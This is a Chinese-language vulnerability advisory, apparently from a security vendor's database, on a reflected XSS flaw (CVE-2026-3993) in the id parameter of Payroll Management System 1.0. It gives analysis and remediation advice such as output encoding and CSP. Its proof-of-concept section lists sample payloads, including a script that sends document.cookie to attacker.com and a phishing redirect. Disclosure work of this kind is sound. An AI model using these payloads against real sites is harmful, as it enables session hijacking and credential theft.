Payroll 1.0 系统 XSS 漏洞CVE-2026-3993

itsourcecode 平台发布的 Payroll Management System（工资管理系统）V1.0 是基于 PHP+MySQL 的开源应用，采用双角色权限体系。

一、基本情况

Payroll 面向中小企业与教学场景，用于员工信息、考勤、薪资核算、补贴扣款、工资条生成与发放的全流程自动化管理，前后端分离。

Payroll 开源工资管理系统前端采用 Bootstrap、JavaScript、jQuery 实现交互，系统的后端则以 PHP 处理业务逻辑，MySQL存储数据。

栋科技漏洞库关注到 Payroll 1.0 系统中存在的一个 XSS 漏洞，该安全漏洞现已经被追踪为CVE-2026-3993，漏洞的CVSS3.X评分 4.3。

二、漏洞分析

CVE-2026-3993漏洞是位于 Payroll 1.0 版本/manage_employee_deductions.php 文件中，其 id 参数存在的一个反射型跨站脚本漏洞。

漏洞源于该版本系统的 /manage_employee_deductions.php 文件在处理 ID 参数时，未对用户输入的参数进行充分的校验和输出编码。

漏洞位于manage_employee_deductions.php组件中，其中用户通过“id”URL参数提供的输入直接反映在页面输出中，未进行适当清理。

远程攻击者可以构造包含恶意 JavaScript 代码的链接，诱导已登录用户点击，从而在用户的浏览器中执行任意脚本。

该漏洞无需身份认证，攻击者仅需诱骗用户访问精心构造的恶意 URL 链接即可完成利用。

潜在影响包括 会话劫持、 未经授权的行为、 数据盗窃、 恶意软件分发。

三、POC概念验证

1、访问如下 URL：

管理员已设置登录后刷新可查看

2、观察 JavaScript 代码执行情况

管理员已设置登录后刷新可查看

3、漏洞利用载荷示例

（1）基础载荷：<script>alert(document.domain)</script>

（2）Cookie 窃取载荷：<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>

（3）页面跳转载荷：<script>window.location='http://phishing.site'</script>

4、修复建议

（1）输入验证

过滤特殊字符

采用白名单校验方式

（2）输出编码

使用 htmlspecialchars () 函数

使用 htmlentities () 函数

（3）安全响应头

内容安全策略（CSP）

X-XSS-Protection 防护头

四、影响范围

Payroll <= 1.0

五、修复建议

Payroll > 1.0

六、参考链接

管理员已设置登录后刷新可查看